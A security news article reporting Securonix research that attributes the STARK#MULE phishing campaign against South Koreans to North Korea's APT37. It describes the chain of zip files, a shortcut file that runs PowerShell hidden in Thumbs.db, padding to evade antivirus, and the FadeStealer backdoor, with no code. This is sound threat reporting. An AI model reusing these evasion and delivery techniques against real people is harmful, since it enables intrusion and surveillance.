Researchers Say APT37 Group Likely Behind Campaign Targeting South Koreans
Government-backed North Korean hackers are posting convincing U.S. military job recruitment documents to lure Korean-speaking victims into downloading malware staged from legitimate but compromised South Korean websites, according to security researchers.
Due to the targets and type of attack, the cybersecurity firm Securonix dubbed this campaign STARK#MULE. They believe that APT37, a North Korean hacking group or other similar organizations, is likely behind the campaign, which is linked to the Ministry of State Security and focuses on attacking South Korean targets.
According to a Securonix threat research report published Friday, the lure documents suggest that they promote U.S. Army or military recruitment resources and fool recipients into opening attached documents and executing the malware.
Last month, APT37, the state-backed cybercrime group, also known as ScarCruft and Reaper, exploited a data transfer and messaging application to inject info-stealing malware with wiretapping capabilities into the devices of targeted South Korea-based individuals, defectors and human rights activists (see: APT37 Exploited Messaging App to Plant Wiretapping Malware).
Researchers said that the entire malicious infrastructure used in the STARK#MULE campaign relies on compromised Korean e-commerce websites, which allow hackers to blend in with normal traffic while evading detection and delivering malware stagers and exerting full command and control on the victim’s machine.
Finally, the attackers inject malware into the target’s machine that runs on a scheduled task and immediately opens communication over HTTP.
Mayuresh Dani, threat research expert at Qualys told Information Security Media Group that bypassing system controls, evasion by blending in with legitimate traffic and gaining complete control on an earmarked target – all the while staying undetected – makes this threat noteworthy.
“STARK#MULE also may have laid their hands on a possible zero-day or at least a variant of a known Microsoft Office vulnerability, which allows the threat actors to gain a foothold on the targeted system just by having the targeted user open the attachment,” Dani said.
The attack campaign begins with a phishing email with a zip file attachment that translates to “U.S. Army job posting website address and how to use it.” Researchers observed that the zip file was not password protected and had three files.
“Embedded inside another zip file is another zip file named “Multi National Recruitment System Templete.pdf.zip.” The awkward usage of “Multi National” and typos such as “Templete” further solidify that the author was of non-English origin or a possible false-flag attempt,” researchers said.
The second zip file was a single shortcut file named the same as the PDF file “Multi National Recruitment System Templete.pdf.lnk.” Researchers are not certain why attackers zipped the .lnk file into its own zip file. “We’re not quite sure as it does increase the odds that this could be missed in favor of the actual PDF file.”
Researchers said that the shortcut file is where likely malicious phishing emails or code execution began. Instead of embedding the malicious code directly into the shortcut file itself, the hackers used the code that is executed simply reads in the contents of one of the other embedded files called “Thumbs.db”
“Thumbs.db” is a legitimate file that simply stores image thumbnails and allows user-friendly browsing and “scrolling experience in Windows Explorer versus having to analyze media files and display a thumbnail image each time you open a directory.”
In this campaign, the Thumbs.db file did not store any image thumbnails. Still, it was loaded with a PowerShell code which was executed by the shortcut file, which will perform several functions including the downloading of further stagers and establishing persistence.
“Throughout the code, the Thumbs.db script contains useless variables named $a and $b, which set themselves to useless, repeating Base64 strings. This is likely an attempt to pad the script in order to evade AV detections, however, the actual malicious code is completely unobfuscated,” researchers said.
The group APT37 in May used the same technique to inject wiretapping malware using a backdoor that exploited Ably, a commercial instant messaging, data synchronization and data transfer application.
According to ASEC researchers, once the AblyGo backdoor is executed on an infected device, APT37 determines the ID of the device and sends additional commands via CMD to execute additional malware and also a fileless info-stealer malware, dubbed FadeStealer by ASEC, which is capable of taking screenshots, logging keystrokes, exfiltrating data and wiretapping microphones.